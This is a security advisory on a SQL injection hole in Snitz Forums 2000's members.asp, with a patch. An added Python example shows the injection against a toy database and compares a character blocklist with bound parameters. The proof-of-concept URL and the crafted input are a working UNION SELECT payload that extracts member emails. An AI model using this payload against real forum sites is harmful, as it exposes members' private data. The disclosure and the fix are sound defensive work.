22nd Apr 2002 [SBWID-5296]
COMMAND
Snitz Forums 2000 remote SQL query manipulation vulnerability
SYSTEMS AFFECTED
Snitz Forums 2000 versions: 3.3, 3.3.01, 3.3.02, 3.3.03
PROBLEM
acemi posted:
In the members.asp page, when listing the members with a criterion, the
input (M_NAME) is not checked for malicious code. As a result, an
attacker can add an extra SELECT statement to the query with UNION and
he/she can view any data in the forum's database.
Proof-of-concept
----------------
Normally, to view the members' list whose membername starts with 'A',
the members.asp page is used as follows:
/members.asp?
mode=search&M_NAME=A&initial=1&method=
Use this link to view the vulnerability:
/members.asp?mode=search&M_NAME=XXXX%
25')%20UNION%20SELECT%20MEMBER_ID,%
20M_STATUS,%20M_NAME%20%2B%20'/'%20%
2B%20M_EMAIL%20%2B%20'/',%20M_LEVEL,%
20M_EMAIL,%20M_COUNTRY,%
20M_HOMEPAGE,%20M_ICQ,%20M_YAHOO,%
20M_AIM,%20M_TITLE,%20M_POSTS,%
20M_LASTPOSTDATE,%20M_LASTHEREDATE,%
20M_DATE,%20M_STATE%20FROM%
20FORUM_MEMBERS%20WHERE%20(M_NAME%
20LIKE%20'&initial=1&method=
The MEMBERNAME column will be the MEMBERNAME/EMAIL/ column.
SOLUTION
To fix this bug, in members.asp, change the following lines:

    SearchName = Request("M_NAME")
    if SearchName = "" then
        SearchName = Request.Form("M_NAME")
    end if

with:

    if IsValidString(Request("M_NAME")) then
        SearchName = Request("M_NAME")
    end if
    if SearchName = "" then
        if IsValidString(Request.Form("M_NAME")) then
            SearchName = Request.Form("M_NAME")
        end if
    end if

and in function IsValidString(sValidate) in inc_functions.asp, change
the following line:

    sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<"

with:

    sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<'"
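The following is an added example, not code from the advisory or from Snitz Forums: a Python/SQLite model of the member search that compares the character blocklist above with a bound query parameter. The query shape `WHERE (M_NAME LIKE '...%')` is inferred from the request shown in the proof-of-concept, the behaviour of IsValidString is assumed (reject any value containing a listed character), and the table rows and the `CRAFTED` input are constructed.

```python
import sqlite3

# Character list from the patched IsValidString line above (quote included).
INVALID_CHARS = "!#$%^&*()=+{}[]|\\;:/?>,<'"

# Constructed input with the same shape as the advisory's request, one column only.
CRAFTED = "zzz%') UNION SELECT M_EMAIL FROM FORUM_MEMBERS WHERE (M_EMAIL LIKE '"


def is_valid_string(value):
    """Assumed IsValidString behaviour: reject a value with any listed character."""
    return not any(ch in INVALID_CHARS for ch in value)


def make_db():
    """In-memory stand-in for the forum database, with constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE FORUM_MEMBERS (M_NAME TEXT, M_EMAIL TEXT)")
    db.executemany(
        "INSERT INTO FORUM_MEMBERS VALUES (?, ?)",
        [("Alice", "alice@example.test"), ("O'Brien", "obrien@example.test")],
    )
    return db


def search_concat(db, name):
    """Unpatched pattern: M_NAME is spliced into the SQL text."""
    sql = "SELECT M_NAME FROM FORUM_MEMBERS WHERE (M_NAME LIKE '" + name + "%')"
    return sorted(row[0] for row in db.execute(sql))


def search_bound(db, name):
    """Bound parameter: M_NAME is data only; LIKE wildcards in it are escaped."""
    esc = name.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT M_NAME FROM FORUM_MEMBERS WHERE (M_NAME LIKE ? ESCAPE '\\')"
    return sorted(row[0] for row in db.execute(sql, (esc + "%",)))


if __name__ == "__main__":
    db = make_db()
    print(search_concat(db, "A"))        # normal search
    print(search_concat(db, CRAFTED))    # e-mail column comes back via UNION
    print(is_valid_string(CRAFTED))      # blocklist rejects the crafted value
    print(is_valid_string("O'Brien"))    # ...and also a legitimate name
    print(search_bound(db, CRAFTED))     # bound: no rows, nothing leaks
    print(search_bound(db, "O'B"))       # bound: legitimate name still searchable
```

The blocklist stops the crafted value but also refuses member names that contain an apostrophe, while the bound parameter handles both cases without filtering.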